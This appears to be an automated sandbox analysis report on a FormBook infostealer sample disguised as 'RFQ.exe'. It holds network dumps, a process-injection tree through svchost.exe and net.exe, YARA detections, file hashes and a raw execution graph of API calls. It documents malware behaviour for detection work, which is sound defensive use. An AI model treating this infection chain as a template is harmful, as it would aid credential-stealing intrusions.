                                                                                                                                                  Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 64 61 74 61 2d 61 64 62 6c 6f 63 6b 6b 65 79 3d 22 4d 46 77 77 44 51 59 4a 4b 6f 5a 49 68 76 63 4e 41 51 45 42 42 51 41 44 53 77 41 77 53 41 4a 42 41 4e 44 72 70 32 6c 7a 37 41 4f 6d 41 44 61 4e 38 74 41 35 30 4c 73 57 63 6a 4c 46 79 51 46 63 62 2f 50 32 54 78 63 35 38 6f 59 4f 65 49 4c 62 33 76 42 77 37 4a 36 66 34 70 61 6d 6b 41 51 56 53 51 75 71 59 73 4b 78 33 59 7a 64 55 48 43 76 62 56 5a 76 46 55 73 43 41 77 45 41 41 51 3d 3d 5f 68 57 53 57 2f 36 6d 79 58 64 41 47 2f 64 44 49 73 56 35 30 4c 73 79 38 38 69 34 73 6d 59 4a 4c 31 73 54 73 6d 38 72 4d 2b 4f 47 71 30 64 79 6a 67 34 2b 32 76 63 5a 47 54 67 2b 32 34 33 77 6b 50 54 67 36 4e 6b 79 70 5a 68 51 6e 39 54 30 63 52 54 70 33 44 67 3d 3d 22 20 6c 61 6e 67 3d 22 65 6e 22 20 73 74 79 6c 65 3d 22 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 32 42 32 42 32 42 3b 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d [TRUNCATED]
                                                                                                                                                  Data Ascii: <!doctype html><html data-adblockkey="MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_hWSW/6myXdAG/dDIsV50Lsy88i4smYJL1sTsm8rM+OGq0dyjg4+2vcZGTg+243wkPTg6NkypZhQn9T0cRTp3Dg==" lang="en" style="background: #2B2B2B;"><head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1"> <link rel="icon" href="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAIAAACQd1PeAAAADElEQVQI12P4//8/AAX+Av7czFnnAAAAAElFTkSuQmCC"
                                                                                                                                                   Nov 14, 2024 15:43:46.729964972 CET | 971 | IN | Data Raw: 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 65 63 6f 6e 6e 65 63 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 22 20 63 72 6f 73 73 6f 72 69 67 69 6e 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62
                                                                                                                                                  Data Ascii: > <link rel="preconnect" href="https://www.google.com" crossorigin></head><body><div id="target" style="opacity: 0"></div><script>window.park = "eyJ1dWlkIjoiMGUxOWJkMmYtMjRiNS00NzU0LWE4ZGQtZTdiYmM1MDM4Nzk2IiwicGFnZV90aW1lIjoxNzMxNTk1ND


                                                                                                                                                  Target ID:0
                                                                                                                                                  Start time:09:39:07
                                                                                                                                                  Start date:14/11/2024
                                                                                                                                                  Path:C:\Users\user\Desktop\RFQ.exe
                                                                                                                                                  Wow64 process (32bit):true
                                                                                                                                                  Commandline:"C:\Users\user\Desktop\RFQ.exe"
                                                                                                                                                  Imagebase:0x730000
                                                                                                                                                  File size:1'217'024 bytes
                                                                                                                                                  MD5 hash:ECD96717AC8201E049CFA4CA22E88DEC
                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                  Reputation:low
                                                                                                                                                  Has exited:true

                                                                                                                                                  Target ID:2
                                                                                                                                                  Start time:09:39:09
                                                                                                                                                  Start date:14/11/2024
                                                                                                                                                  Path:C:\Windows\SysWOW64\svchost.exe
                                                                                                                                                  Wow64 process (32bit):true
                                                                                                                                                  Commandline:"C:\Users\user\Desktop\RFQ.exe"
                                                                                                                                                  Imagebase:0xcb0000
                                                                                                                                                  File size:46'504 bytes
                                                                                                                                                  MD5 hash:1ED18311E3DA35942DB37D15FA40CC5B
                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                  Yara matches:
                                                                                                                                                  • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000002.00000002.2291393354.0000000003800000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                                                  • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000002.00000002.2291056975.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                                                  • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000002.00000002.2291967315.0000000005E00000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                                                  Reputation:high
                                                                                                                                                  Has exited:true

                                                                                                                                                  Target ID:3
                                                                                                                                                  Start time:09:39:14
                                                                                                                                                  Start date:14/11/2024
                                                                                                                                                  Path:C:\Program Files (x86)\kuDTOOcwiVdWlQPDkujIixANdwTkyBLAEiGaFiCvvzloAjFxomVKtSQk\enUILRNjDql.exe
                                                                                                                                                  Wow64 process (32bit):true
                                                                                                                                                  Commandline:"C:\Program Files (x86)\kuDTOOcwiVdWlQPDkujIixANdwTkyBLAEiGaFiCvvzloAjFxomVKtSQk\enUILRNjDql.exe"
                                                                                                                                                  Imagebase:0xf40000
                                                                                                                                                  File size:140'800 bytes
                                                                                                                                                  MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                                                                                                                                                  Has elevated privileges:false
                                                                                                                                                  Has administrator privileges:false
                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                  Yara matches:
                                                                                                                                                  • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000003.00000002.4572938071.00000000047E0000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                                                  Reputation:high
                                                                                                                                                  Has exited:false

                                                                                                                                                  Target ID:4
                                                                                                                                                  Start time:09:39:20
                                                                                                                                                  Start date:14/11/2024
                                                                                                                                                  Path:C:\Windows\SysWOW64\net.exe
                                                                                                                                                  Wow64 process (32bit):true
                                                                                                                                                  Commandline:"C:\Windows\SysWOW64\net.exe"
                                                                                                                                                  Imagebase:0x1b0000
                                                                                                                                                  File size:47'104 bytes
                                                                                                                                                  MD5 hash:31890A7DE89936F922D44D677F681A7F
                                                                                                                                                  Has elevated privileges:false
                                                                                                                                                  Has administrator privileges:false
                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                  Yara matches:
                                                                                                                                                  • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000004.00000002.4572018212.0000000002EE0000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                                                  • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000004.00000002.4573259207.0000000003480000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                  • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000004.00000002.4573144434.0000000003320000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                  Reputation:high
                                                                                                                                                  Has exited:false

                                                                                                                                                  Target ID:6
                                                                                                                                                  Start time:09:39:33
                                                                                                                                                  Start date:14/11/2024
                                                                                                                                                  Path:C:\Program Files (x86)\kuDTOOcwiVdWlQPDkujIixANdwTkyBLAEiGaFiCvvzloAjFxomVKtSQk\enUILRNjDql.exe
                                                                                                                                                  Wow64 process (32bit):true
                                                                                                                                                  Commandline:"C:\Program Files (x86)\kuDTOOcwiVdWlQPDkujIixANdwTkyBLAEiGaFiCvvzloAjFxomVKtSQk\enUILRNjDql.exe"
                                                                                                                                                  Imagebase:0xf40000
                                                                                                                                                  File size:140'800 bytes
                                                                                                                                                  MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                                                                                                                                                  Has elevated privileges:false
                                                                                                                                                  Has administrator privileges:false
                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                  Yara matches:
                                                                                                                                                  • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000006.00000002.4574678267.0000000004EA0000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                                                  Reputation:high
                                                                                                                                                  Has exited:false

                                                                                                                                                  Target ID:8
                                                                                                                                                  Start time:09:39:45
                                                                                                                                                  Start date:14/11/2024
                                                                                                                                                  Path:C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                  Commandline:"C:\Program Files\Mozilla Firefox\Firefox.exe"
                                                                                                                                                  Imagebase:0x7ff79f9e0000
                                                                                                                                                  File size:676'768 bytes
                                                                                                                                                  MD5 hash:C86B1BE9ED6496FE0E0CBE73F81D8045
                                                                                                                                                  Has elevated privileges:false
                                                                                                                                                  Has administrator privileges:false
                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                  Reputation:high
                                                                                                                                                  Has exited:true

Execution Graph

Execution Coverage: 3.9%
Dynamic/Decrypted Code Coverage: 0.4%
Signature Coverage: 8.6%
Total number of Nodes: 2000
Total number of Limit Nodes: 150
                                                                                                                                                    execution_graph 93683 7a19ba 93688 74c75a 93683->93688 93687 7a19c9 93696 73d7f7 93688->93696 93693 74c865 93694 74c881 93693->93694 93704 74d1fa 48 API calls _memcpy_s 93693->93704 93695 750f0a 52 API calls __cinit 93694->93695 93695->93687 93705 74f4ea 93696->93705 93698 73d818 93699 74f4ea 48 API calls 93698->93699 93700 73d826 93699->93700 93701 74d26c 93700->93701 93736 74d298 93701->93736 93704->93693 93708 74f4f2 __calloc_impl 93705->93708 93707 74f50c 93707->93698 93708->93707 93709 74f50e std::exception::exception 93708->93709 93714 75395c 93708->93714 93728 756805 RaiseException 93709->93728 93711 74f538 93729 75673b 47 API calls _free 93711->93729 93713 74f54a 93713->93698 93715 7539d7 __calloc_impl 93714->93715 93723 753968 __calloc_impl 93714->93723 93735 757c0e 47 API calls __getptd_noexit 93715->93735 93718 75399b RtlAllocateHeap 93718->93723 93727 7539cf 93718->93727 93720 7539c3 93733 757c0e 47 API calls __getptd_noexit 93720->93733 93723->93718 93723->93720 93724 7539c1 93723->93724 93725 753973 93723->93725 93734 757c0e 47 API calls __getptd_noexit 93724->93734 93725->93723 93730 7581c2 47 API calls 2 library calls 93725->93730 93731 75821f 47 API calls 8 library calls 93725->93731 93732 751145 GetModuleHandleExW GetProcAddress ExitProcess ___crtCorExitProcess 93725->93732 93727->93708 93728->93711 93729->93713 93730->93725 93731->93725 93733->93724 93734->93727 93735->93727 93737 74d28b 93736->93737 93738 74d2a5 93736->93738 93737->93693 93738->93737 93739 74d2ac RegOpenKeyExW 93738->93739 93739->93737 93740 74d2c6 RegQueryValueExW 93739->93740 93741 74d2e7 93740->93741 93742 74d2fc RegCloseKey 93740->93742 93741->93742 93742->93737 93743 7a197b 93748 74dd94 93743->93748 93747 7a198a 93749 74f4ea 48 API calls 93748->93749 93750 74dd9c 93749->93750 93752 74ddb0 93750->93752 93756 74df3d 93750->93756 
93755 750f0a 52 API calls __cinit 93752->93755 93755->93747 93757 74df46 93756->93757 93759 74dda8 93756->93759 93788 750f0a 52 API calls __cinit 93757->93788 93760 74ddc0 93759->93760 93761 73d7f7 48 API calls 93760->93761 93762 74ddd7 GetVersionExW 93761->93762 93789 736a63 93762->93789 93764 74de1a 93800 74dfb4 93764->93800 93770 7a24c8 93772 74dea4 GetCurrentProcess 93817 74df5f LoadLibraryA GetProcAddress 93772->93817 93773 74df31 GetSystemInfo 93778 74df0e 93773->93778 93774 74dee3 93811 74e00c 93774->93811 93777 74debb 93777->93773 93777->93774 93780 74df21 93778->93780 93781 74df1c FreeLibrary 93778->93781 93780->93752 93781->93780 93782 74df29 GetSystemInfo 93785 74df03 93782->93785 93783 74def9 93814 74dff4 93783->93814 93785->93778 93787 74df09 FreeLibrary 93785->93787 93787->93778 93788->93759 93790 736adf 93789->93790 93791 736a6f __wsetenvp 93789->93791 93831 73b18b 93790->93831 93793 736ad7 93791->93793 93794 736a8b 93791->93794 93830 73c369 48 API calls 93793->93830 93818 736b4a 93794->93818 93797 736a95 93821 74ee75 93797->93821 93799 736ab6 _memcpy_s 93799->93764 93801 74dfbd 93800->93801 93802 73b18b 48 API calls 93801->93802 93803 74de22 93802->93803 93804 736571 93803->93804 93805 73657f 93804->93805 93806 73b18b 48 API calls 93805->93806 93807 73658f 93806->93807 93807->93770 93808 74df77 93807->93808 93843 74df89 93808->93843 93847 74e01e 93811->93847 93815 74e00c 2 API calls 93814->93815 93816 74df01 GetNativeSystemInfo 93815->93816 93816->93785 93817->93777 93819 74f4ea 48 API calls 93818->93819 93820 736b54 93819->93820 93820->93797 93823 74f4ea __calloc_impl 93821->93823 93822 75395c __crtGetStringTypeA_stat 47 API calls 93822->93823 93823->93822 93824 74f50c 93823->93824 93825 74f50e std::exception::exception 93823->93825 93824->93799 93835 756805 RaiseException 93825->93835 93827 74f538 93836 75673b 47 API calls _free 93827->93836 93829 74f54a 93829->93799 93830->93799 93832 73b1a2 _memcpy_s 93831->93832 93833 73b199 93831->93833 
93832->93799 93833->93832 93837 73bdfa 93833->93837 93835->93827 93836->93829 93838 73be0a _memcpy_s 93837->93838 93839 73be0d 93837->93839 93838->93832 93840 74f4ea 48 API calls 93839->93840 93841 73be17 93840->93841 93842 74ee75 48 API calls 93841->93842 93842->93838 93844 74dea0 93843->93844 93845 74df92 LoadLibraryA 93843->93845 93844->93772 93844->93777 93845->93844 93846 74dfa3 GetProcAddress 93845->93846 93846->93844 93848 74def1 93847->93848 93849 74e027 LoadLibraryA 93847->93849 93848->93782 93848->93783 93849->93848 93850 74e038 GetProcAddress 93849->93850 93850->93848 93851 733742 93852 73374b 93851->93852 93853 733769 93852->93853 93854 7337c8 93852->93854 93891 7337c6 93852->93891 93858 733776 93853->93858 93859 73382c PostQuitMessage 93853->93859 93856 7a1e00 93854->93856 93857 7337ce 93854->93857 93855 7337ab DefWindowProcW 93893 7337b9 93855->93893 93900 732ff6 16 API calls 93856->93900 93860 7337d3 93857->93860 93861 7337f6 SetTimer RegisterWindowMessageW 93857->93861 93863 7a1e88 93858->93863 93864 733781 93858->93864 93859->93893 93865 7a1da3 93860->93865 93866 7337da KillTimer 93860->93866 93868 73381f CreatePopupMenu 93861->93868 93861->93893 93915 774ddd 60 API calls _memset 93863->93915 93869 733836 93864->93869 93870 733789 93864->93870 93874 7a1da8 93865->93874 93875 7a1ddc MoveWindow 93865->93875 93896 733847 Shell_NotifyIconW _memset 93866->93896 93867 7a1e27 93901 74e312 346 API calls Mailbox 93867->93901 93868->93893 93898 74eb83 53 API calls _memset 93869->93898 93878 7a1e6d 93870->93878 93879 733794 93870->93879 93872 7a1e9a 93872->93855 93872->93893 93883 7a1dcb SetFocus 93874->93883 93884 7a1dac 93874->93884 93875->93893 93878->93855 93914 76a5f3 48 API calls 93878->93914 93880 7a1e58 93879->93880 93881 73379f 93879->93881 93913 7755bd 70 API calls _memset 93880->93913 93881->93855 93902 733847 Shell_NotifyIconW _memset 93881->93902 93882 733845 93882->93893 93883->93893 93884->93881 93886 7a1db5 93884->93886 93885 7337ed 93897 
73390f DeleteObject DestroyWindow Mailbox 93885->93897 93899 732ff6 16 API calls 93886->93899 93891->93855 93894 7a1e4c 93903 734ffc 93894->93903 93896->93885 93897->93893 93898->93882 93899->93893 93900->93867 93901->93881 93902->93894 93904 735027 _memset 93903->93904 93916 734c30 93904->93916 93907 7350ac 93909 7a3d28 Shell_NotifyIconW 93907->93909 93910 7350ca Shell_NotifyIconW 93907->93910 93920 7351af 93910->93920 93912 7350df 93912->93891 93913->93882 93914->93891 93915->93872 93917 734c44 93916->93917 93918 7a3c33 93916->93918 93917->93907 93942 775819 61 API calls _W_store_winword 93917->93942 93918->93917 93919 7a3c3c DestroyIcon 93918->93919 93919->93917 93921 7352a2 Mailbox 93920->93921 93922 7351cb 93920->93922 93921->93912 93943 736b0f 93922->93943 93925 7351e6 93927 736a63 48 API calls 93925->93927 93926 7a3ca1 LoadStringW 93929 7a3cbb 93926->93929 93928 7351fb 93927->93928 93928->93929 93930 73520c 93928->93930 93931 73510d 48 API calls 93929->93931 93932 7352a7 93930->93932 93933 735216 93930->93933 93936 7a3cc5 93931->93936 93957 736eed 93932->93957 93948 73510d 93933->93948 93939 735220 _memset _wcscpy 93936->93939 93961 73518c 93936->93961 93938 7a3ce7 93940 73518c 48 API calls 93938->93940 93941 735288 Shell_NotifyIconW 93939->93941 93940->93939 93941->93921 93942->93907 93944 74f4ea 48 API calls 93943->93944 93945 736b34 93944->93945 93946 736b4a 48 API calls 93945->93946 93947 7351d9 93946->93947 93947->93925 93947->93926 93949 73511f 93948->93949 93950 7a1be7 93948->93950 93971 73b384 93949->93971 93980 76a58f 48 API calls _memcpy_s 93950->93980 93953 73512b 93953->93939 93954 7a1bf1 93955 736eed 48 API calls 93954->93955 93956 7a1bf9 Mailbox 93955->93956 93958 736f00 93957->93958 93959 736ef8 93957->93959 93958->93939 93986 73dd47 48 API calls _memcpy_s 93959->93986 93962 735197 93961->93962 93963 7a1ace 93962->93963 93964 73519f 93962->93964 93966 736b4a 48 API calls 93963->93966 93987 735130 93964->93987 93968 7a1adb __wsetenvp 
93966->93968 93967 7351aa 93967->93938 93969 74ee75 48 API calls 93968->93969 93970 7a1b07 _memcpy_s 93969->93970 93972 73b392 93971->93972 93979 73b3c5 _memcpy_s 93971->93979 93973 73b3b8 93972->93973 93974 73b3fd 93972->93974 93972->93979 93981 73bb85 93973->93981 93976 74f4ea 48 API calls 93974->93976 93977 73b407 93976->93977 93978 74f4ea 48 API calls 93977->93978 93978->93979 93979->93953 93980->93954 93982 73bb9b 93981->93982 93985 73bb96 _memcpy_s 93981->93985 93983 7a1b77 93982->93983 93984 74ee75 48 API calls 93982->93984 93984->93985 93985->93979 93986->93958 93988 73513f __wsetenvp 93987->93988 93989 735151 93988->93989 93990 7a1b27 93988->93990 93991 73bb85 48 API calls 93989->93991 93992 736b4a 48 API calls 93990->93992 93993 73515e _memcpy_s 93991->93993 93994 7a1b34 93992->93994 93993->93967 93995 74ee75 48 API calls 93994->93995 93996 7a1b57 _memcpy_s 93995->93996 93997 7a19cb 94002 732322 93997->94002 93999 7a19d1 94035 750f0a 52 API calls __cinit 93999->94035 94001 7a19db 94003 732344 94002->94003 94036 7326df 94003->94036 94008 73d7f7 48 API calls 94009 732384 94008->94009 94010 73d7f7 48 API calls 94009->94010 94011 73238e 94010->94011 94012 73d7f7 48 API calls 94011->94012 94013 732398 94012->94013 94014 73d7f7 48 API calls 94013->94014 94015 7323de 94014->94015 94016 73d7f7 48 API calls 94015->94016 94017 7324c1 94016->94017 94044 73263f 94017->94044 94021 7324f1 94022 73d7f7 48 API calls 94021->94022 94023 7324fb 94022->94023 94073 732745 94023->94073 94025 732546 94026 732556 GetStdHandle 94025->94026 94027 7325b1 94026->94027 94028 7a501d 94026->94028 94029 7325b7 CoInitialize 94027->94029 94028->94027 94030 7a5026 94028->94030 94029->93999 94080 7792d4 53 API calls 94030->94080 94032 7a502d 94081 7799f9 CreateThread 94032->94081 94034 7a5039 CloseHandle 94034->94029 94035->94001 94082 732854 94036->94082 94039 736a63 48 API calls 94040 73234a 94039->94040 94041 73272e 94040->94041 94096 7327ec 6 API calls 94041->94096 94043 73237a 
94043->94008 94045 73d7f7 48 API calls 94044->94045 94046 73264f 94045->94046 94047 73d7f7 48 API calls 94046->94047 94048 732657 94047->94048 94097 7326a7 94048->94097 94051 7326a7 48 API calls 94052 732667 94051->94052 94053 73d7f7 48 API calls 94052->94053 94054 732672 94053->94054 94055 74f4ea 48 API calls 94054->94055 94056 7324cb 94055->94056 94057 7322a4 94056->94057 94058 7322b2 94057->94058 94059 73d7f7 48 API calls 94058->94059 94060 7322bd 94059->94060 94061 73d7f7 48 API calls 94060->94061 94062 7322c8 94061->94062 94063 73d7f7 48 API calls 94062->94063 94064 7322d3 94063->94064 94065 73d7f7 48 API calls 94064->94065 94066 7322de 94065->94066 94067 7326a7 48 API calls 94066->94067 94068 7322e9 94067->94068 94069 74f4ea 48 API calls 94068->94069 94070 7322f0 94069->94070 94071 7322f9 RegisterWindowMessageW 94070->94071 94072 7a1fe7 94070->94072 94071->94021 94074 732755 94073->94074 94075 7a5f4d 94073->94075 94076 74f4ea 48 API calls 94074->94076 94102 77c942 50 API calls 94075->94102 94078 73275d 94076->94078 94078->94025 94079 7a5f58 94080->94032 94081->94034 94103 7799df 54 API calls 94081->94103 94089 732870 94082->94089 94085 732870 48 API calls 94086 732864 94085->94086 94087 73d7f7 48 API calls 94086->94087 94088 732716 94087->94088 94088->94039 94090 73d7f7 48 API calls 94089->94090 94091 73287b 94090->94091 94092 73d7f7 48 API calls 94091->94092 94093 732883 94092->94093 94094 73d7f7 48 API calls 94093->94094 94095 73285c 94094->94095 94095->94085 94096->94043 94098 73d7f7 48 API calls 94097->94098 94099 7326b0 94098->94099 94100 73d7f7 48 API calls 94099->94100 94101 73265f 94100->94101 94101->94051 94102->94079 94104 7a8eb8 94108 77a635 94104->94108 94106 7a8ec3 94107 77a635 84 API calls 94106->94107 94107->94106 94109 77a66f 94108->94109 94114 77a642 94108->94114 94109->94106 94110 77a671 94140 74ec4e 81 API calls 94110->94140 94112 77a676 94119 73936c 94112->94119 94114->94109 94114->94110 94114->94112 94117 77a669 94114->94117 94115 77a67d 
94116 73510d 48 API calls 94115->94116 94116->94109 94139 744525 61 API calls _memcpy_s 94117->94139 94120 739384 94119->94120 94137 739380 94119->94137 94121 7a4cbd __i64tow 94120->94121 94122 7a4bbf 94120->94122 94123 739398 94120->94123 94131 7393b0 __itow Mailbox _wcscpy 94120->94131 94124 7a4bc8 94122->94124 94125 7a4ca5 94122->94125 94141 75172b 80 API calls 3 library calls 94123->94141 94130 7a4be7 94124->94130 94124->94131 94148 75172b 80 API calls 3 library calls 94125->94148 94128 74f4ea 48 API calls 94129 7393ba 94128->94129 94129->94137 94142 73ce19 94129->94142 94132 74f4ea 48 API calls 94130->94132 94131->94128 94134 7a4c04 94132->94134 94135 74f4ea 48 API calls 94134->94135 94136 7a4c2a 94135->94136 94136->94137 94138 73ce19 48 API calls 94136->94138 94137->94115 94138->94137 94139->94109 94140->94112 94141->94131 94143 73ce28 __wsetenvp 94142->94143 94144 74ee75 48 API calls 94143->94144 94145 73ce50 _memcpy_s 94144->94145 94146 74f4ea 48 API calls 94145->94146 94147 73ce66 94146->94147 94147->94137 94148->94131 94149 73ef80 94152 743b70 94149->94152 94151 73ef8c 94153 7442a5 94152->94153 94154 743bc8 94152->94154 94278 77cc5c 86 API calls 4 library calls 94153->94278 94155 743bef 94154->94155 94157 7a6fd1 94154->94157 94159 7a6f7e 94154->94159 94166 7a6f9b 94154->94166 94156 74f4ea 48 API calls 94155->94156 94158 743c18 94156->94158 94266 78ceca 346 API calls Mailbox 94157->94266 94162 74f4ea 48 API calls 94158->94162 94159->94155 94163 7a6f87 94159->94163 94161 7a6fbe 94265 77cc5c 86 API calls 4 library calls 94161->94265 94185 743c2c _memcpy_s __wsetenvp 94162->94185 94263 78d552 346 API calls Mailbox 94163->94263 94166->94161 94264 78da0e 346 API calls 2 library calls 94166->94264 94169 7a73b0 94169->94151 94170 7a737a 94284 77cc5c 86 API calls 4 library calls 94170->94284 94171 7a7297 94274 77cc5c 86 API calls 4 library calls 94171->94274 94175 7440df 94275 77cc5c 86 API calls 4 library calls 94175->94275 94177 7a707e 94267 77cc5c 86 API calls 
4 library calls 94177->94267 94179 74dce0 53 API calls 94179->94185 94184 73d645 53 API calls 94184->94185 94185->94153 94185->94170 94185->94171 94185->94175 94185->94177 94185->94179 94185->94184 94186 74f4ea 48 API calls 94185->94186 94188 7a72d2 94185->94188 94190 73fe30 346 API calls 94185->94190 94192 7a7350 94185->94192 94193 7a7363 94185->94193 94197 7442f2 94185->94197 94198 736a63 48 API calls 94185->94198 94199 7a72e9 94185->94199 94202 7a714c 94185->94202 94204 743f2b 94185->94204 94205 7a733f 94185->94205 94207 73d286 48 API calls 94185->94207 94211 74ee75 48 API calls 94185->94211 94212 736eed 48 API calls 94185->94212 94215 7a71e1 94185->94215 94224 73cdb9 94185->94224 94238 73d6e9 94185->94238 94242 73d9a0 94185->94242 94249 73d83d 53 API calls 94185->94249 94250 74c15c 48 API calls 94185->94250 94251 74c050 94185->94251 94262 74becb 346 API calls 94185->94262 94268 73dcae 50 API calls Mailbox 94185->94268 94269 78ccdc 48 API calls 94185->94269 94270 77a1eb 50 API calls 94185->94270 94186->94185 94276 77cc5c 86 API calls 4 library calls 94188->94276 94190->94185 94282 77cc5c 86 API calls 4 library calls 94192->94282 94283 77cc5c 86 API calls 4 library calls 94193->94283 94285 77cc5c 86 API calls 4 library calls 94197->94285 94198->94185 94277 77cc5c 86 API calls 4 library calls 94199->94277 94271 78ccdc 48 API calls 94202->94271 94204->94151 94281 77cc5c 86 API calls 4 library calls 94205->94281 94207->94185 94209 7a71a1 94273 74c15c 48 API calls 94209->94273 94211->94185 94212->94185 94215->94204 94280 77cc5c 86 API calls 4 library calls 94215->94280 94217 7a715f 94217->94209 94272 78ccdc 48 API calls 94217->94272 94218 7a71ce 94219 74c050 48 API calls 94218->94219 94221 7a71d6 94219->94221 94220 7a71ab 94220->94153 94220->94218 94221->94215 94222 7a7313 94221->94222 94279 77cc5c 86 API calls 4 library calls 94222->94279 94225 73cdfb 94224->94225 94230 73cdc5 94224->94230 94226 73ce04 94225->94226 94227 73ce0e 94225->94227 94228 736a63 48 API calls 
94226->94228 94286 73bcce 94227->94286 94235 73cdf1 94228->94235 94231 74f4ea 48 API calls 94230->94231 94232 73cdd8 94231->94232 94233 73cde3 94232->94233 94234 7a4621 94232->94234 94233->94235 94237 73ce19 48 API calls 94233->94237 94234->94235 94236 73d7f7 48 API calls 94234->94236 94235->94185 94236->94235 94237->94235 94239 73d6f4 94238->94239 94241 73d71b 94239->94241 94292 73d764 94239->94292 94241->94185 94243 73d9b3 94242->94243 94244 73db7f 94242->94244 94245 73d7f7 48 API calls 94243->94245 94248 73d9c4 94243->94248 94244->94185 94246 73dbe1 94245->94246 94312 750f0a 52 API calls __cinit 94246->94312 94248->94185 94249->94185 94250->94185 94252 74c064 94251->94252 94254 74c069 Mailbox 94251->94254 94313 74c1af 48 API calls 94252->94313 94259 74c077 94254->94259 94314 74c15c 48 API calls 94254->94314 94256 74f4ea 48 API calls 94258 74c108 94256->94258 94257 74c152 94257->94185 94260 74f4ea 48 API calls 94258->94260 94259->94256 94259->94257 94261 74c113 94260->94261 94261->94185 94261->94261 94262->94185 94263->94204 94264->94161 94265->94157 94266->94185 94267->94204 94268->94185 94269->94185 94270->94185 94271->94217 94272->94217 94273->94220 94274->94175 94275->94204 94276->94199 94277->94204 94278->94204 94279->94204 94280->94204 94281->94204 94282->94204 94283->94204 94284->94204 94285->94169 94287 73bce8 94286->94287 94291 73bcdb 94286->94291 94288 74f4ea 48 API calls 94287->94288 94289 73bcf2 94288->94289 94290 74ee75 48 API calls 94289->94290 94290->94291 94291->94235 94293 73d9a0 53 API calls 94292->94293 94294 73d773 94293->94294 94295 73d781 94294->94295 94296 7a4490 94294->94296 94297 74f4ea 48 API calls 94295->94297 94311 73dcae 50 API calls Mailbox 94296->94311 94300 73d793 94297->94300 94299 7a449b 94299->94299 94301 73d7a1 94300->94301 94302 73d7f7 48 API calls 94300->94302 94303 73d7b0 94301->94303 94309 73dd47 48 API calls _memcpy_s 94301->94309 94302->94301 94305 74f4ea 48 API calls 94303->94305 94306 73d7ba 94305->94306 94310 73d8c0 53 
API calls 94306->94310 94308 73d7e2 94308->94241 94309->94303 94310->94308 94311->94299 94312->94248 94313->94254 94314->94259 94315 1066030 94329 1063c80 94315->94329 94317 1066129 94332 1065f20 94317->94332 94335 1067150 GetPEB 94329->94335 94331 106430b 94331->94317 94333 1065f29 Sleep 94332->94333 94334 1065f37 94333->94334 94336 106717a 94335->94336 94336->94331 94337 7a9bec 94360 740ae0 _memcpy_s Mailbox 94337->94360 94339 741526 Mailbox 94418 77cc5c 86 API calls 4 library calls 94339->94418 94342 74f4ea 48 API calls 94362 73fec8 94342->94362 94343 7415b5 94419 77cc5c 86 API calls 4 library calls 94343->94419 94345 740509 94421 77cc5c 86 API calls 4 library calls 94345->94421 94346 74146e 94353 736eed 48 API calls 94346->94353 94348 741473 94420 77cc5c 86 API calls 4 library calls 94348->94420 94351 7aa246 94355 736eed 48 API calls 94351->94355 94352 7aa922 94366 73ffe1 Mailbox 94353->94366 94354 736eed 48 API calls 94354->94362 94355->94366 94358 7aa873 94359 73d7f7 48 API calls 94359->94362 94360->94339 94360->94362 94364 73ce19 48 API calls 94360->94364 94360->94366 94372 74f4ea 48 API calls 94360->94372 94374 7aa706 94360->94374 94376 7697ed InterlockedDecrement 94360->94376 94378 790d09 94360->94378 94383 73fe30 94360->94383 94412 78ef61 82 API calls 2 library calls 94360->94412 94413 78f0ac 90 API calls Mailbox 94360->94413 94414 77a6ef 48 API calls 94360->94414 94415 78e822 346 API calls Mailbox 94360->94415 94361 7aa30e 94361->94366 94416 7697ed InterlockedDecrement 94361->94416 94362->94342 94362->94343 94362->94345 94362->94346 94362->94348 94362->94351 94362->94354 94362->94359 94362->94361 94363 750f0a 52 API calls __cinit 94362->94363 94365 7697ed InterlockedDecrement 